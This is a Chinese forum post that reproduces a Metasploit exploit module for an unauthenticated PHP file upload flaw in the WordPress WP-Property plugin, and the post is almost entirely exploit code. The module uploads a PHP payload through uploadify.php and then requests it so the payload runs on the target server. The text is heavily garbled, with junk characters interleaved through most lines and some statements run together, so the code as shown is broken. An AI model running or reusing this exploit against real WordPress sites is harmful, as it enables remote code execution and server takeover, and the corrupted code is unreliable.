WordPress WP-Property PHP 文件上传漏洞
, C1 z" A% l& _5 o1 D7 V6 S8 p6 Z; H
## # This file is part of the Metasploit Framework and may be subject to. Z/ C' k' Y& b3 ]
. f* _$ i; k. h& n
# redistribution and commercial restrictions. Please see the Metasploit
& Q Q3 a, P, m; R1 p. \6 _4 c3 V& C6 ~! ?' E; N' I
# Framework web site for more information on licensing and terms of use.& P( z5 L; T6 {: \5 F, C
5 g, N3 U( S! P: P& P& f5 S/ I! w# http://metasploit.com/framework/ ##
' i4 o9 F6 r) ] C8 a* I$ [2 { ]5 E3 C' b
w1 @+ q, G/ V2 _2 K6 U% A8 w2 D# V. J: q3 ?3 L
. c" v. P- H4 j
' E- M! ^* _3 @$ @6 Trequire 'msf/core'! F8 c& D9 @ {4 t( r8 v8 }- r
require 'msf/core/exploit/php_exe'
9 z V/ U+ w# B! S/ ^" I0 A6 o$ r. k
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',& y" o5 [3 y z& K, E0 I; ?: _- L
'Description' => %q{
0 y- G# u$ i8 ~ HThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' => O: F7 i* l% n$ m% G& d% h' E0 X* R
[( L% o U6 v( H( U8 f
'Sammy FORGIT', # initial discovery
0 w1 @& Q/ }# O8 `! N+ L" ?2 `'James Fitts <fitts.james[at]gmail.com>' # metasploit module
; W$ `$ `' J. h+ ?, a+ D" A0 F],
% i6 R. x5 ~+ |! Q. E( Z'License' => MSF_LICENSE,
6 V! J1 J B9 K) z2 S; @'References' =>* s+ l4 n" J" \
[- X4 {+ F3 V0 t T9 G
[ 'OSVDB', '82656' ],
5 w. }. E: y8 j8 y5 M9 W[ 'BID', '53787' ],3 d: @. `; E* d
[ 'EDB', '18987'],
0 ?) Z, t5 Z- j9 S5 h[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
- @$ a% r- O$ w],0 _! ?7 a" m4 T, M# O
'Payload' =>
6 r0 E& x* M" @{
1 Z- l7 C9 \+ ^. }0 i$ Q'BadChars' => "\x00",
) t- Q) k6 K" B. R _2 V8 O7 F) j/ y},, y. g3 n' d) v: ~, \' Q
'Platform' => 'php',: D; w9 S d) ]
'Arch' => ARCH_PHP,
# ]7 _( D, {2 f X3 Q/ |'Targets' =>8 r$ N! R) P" h, C
[
% O4 j: v( b: H! \) q8 r[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
) `0 V" r7 K6 I: A[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] e% \* N4 [0 y7 u* N% M* d
],
" b W( u# o' ~2 D) u'DefaultTarget' => 0,% m' T8 }, K" O0 h
'DisclosureDate' => 'Mar 26 2012')): u$ }8 i4 m- D3 U) I
3 B% K* s) t, m. ^) v! s4 Nregister_options(* ]5 q, C" T9 P# c" U' q' {# v |
[
% `; d7 g* E* @OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
9 S" v( U4 ~( w; q0 @4 Q7 x- `], self.class)8 X4 s" \) _7 c0 x
end
8 s9 J2 s# m l3 m% M# j9 r* d0 n- C5 w0 t4 ^5 i
def check
* L) r' k8 M$ V7 i6 k/ Uuri = target_uri.path
6 l- p, B' O/ C& u9 @uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
% m3 }/ {# q, G0 S; z4 K1 t) {( n'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
5 C+ i* o4 \3 W, c; A1 e})6 B c# G, [2 z1 q2 k* q0 K
6 F9 m# }0 d, A, x/ H1 j3 M" Dif not res or res.code != 2006 ^% }; @; {9 Y2 C) j
return Exploit::CheckCode::Unknown3 g1 A* }$ a2 P1 t. M' L" P
end; p, _& }. a! [' t7 S
% Y0 r: A# K' v" M( h
return Exploit::CheckCode::Appears
0 B; y; Q) ~0 nend
4 T# D+ g8 G8 X6 v; ?+ K& f! Q7 N4 k" ]* x
def exploit* x7 Z1 N, O7 S5 c# y" Z
uri = target_uri.path
0 f/ e" \* Z/ P+ Duri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)$ o8 x3 ~. I" x( g# L! r% b2 E
8 M" t1 |2 `: c1 ^1 p; C& Zdata = Rex::MIME::Message.new
! \, G1 g5 s3 p# e4 r/ Hdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")( P, Q( z: B' ?/ H# I& X- x, x1 I9 k# e
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
. P/ Z. S& c) Mpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
: F# W# U" j2 g) V0 N! ]# Z5 ?: _) z, c% a. N* u3 z
print_status("#{peer} - Uploading payload #{@payload_name}")0 a5 g+ J. B! Q1 L
res = send_request_cgi({# D3 W0 P2 G6 N) Y0 e
'method' => 'POST',
& r7 E6 ], @$ O% g6 g+ z8 Z'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",: s3 D& y0 Q" p7 t. u/ i
'ctype' => "multipart/form-data; boundary=#{data.bound}",
/ H5 J5 X( v' V U+ l1 z. R'data' => post_data/ t0 ~/ q& c& C* S {1 F
})2 ^6 A; w4 i0 u# a' l. C K8 L
0 N0 Q1 I. s5 L( K( b) B5 U( `4 v
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
) q) @3 C" Z6 ?fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")/ I5 B$ G, x) c: d |6 `$ z
end/ U4 Q0 i4 u$ T6 O$ A/ f Z
- i5 s* ?( p# _ o
upload_uri = res.body
: k9 j: X6 }2 w
: u* f" _- A4 sprint_status("#{peer} - Executing payload #{@payload_name}")
3 k# l- `9 M$ D' V$ [! ^* Q0 G# f! Bres = send_request_raw({
; y9 d; D4 O2 S T7 Q5 t'uri' => upload_uri,* \1 B: N# }9 z
'method' => 'GET'& \$ q# q* k4 v
}) p4 J2 U( r, c6 e: c, i
end4 J8 \- [$ O2 y) r2 G
end7 n5 r3 Z8 T. a1 q5 m* ~
/ M$ S2 I& I+ T9 s T- o. ~: z
不要问我这写的是什么 怎么利用 我是说msf.5 |0 Q$ s, Y/ u2 s
; p% [: p' m! S |
发表于 2013-1-4 19:51:30
收藏
分享
支持
反对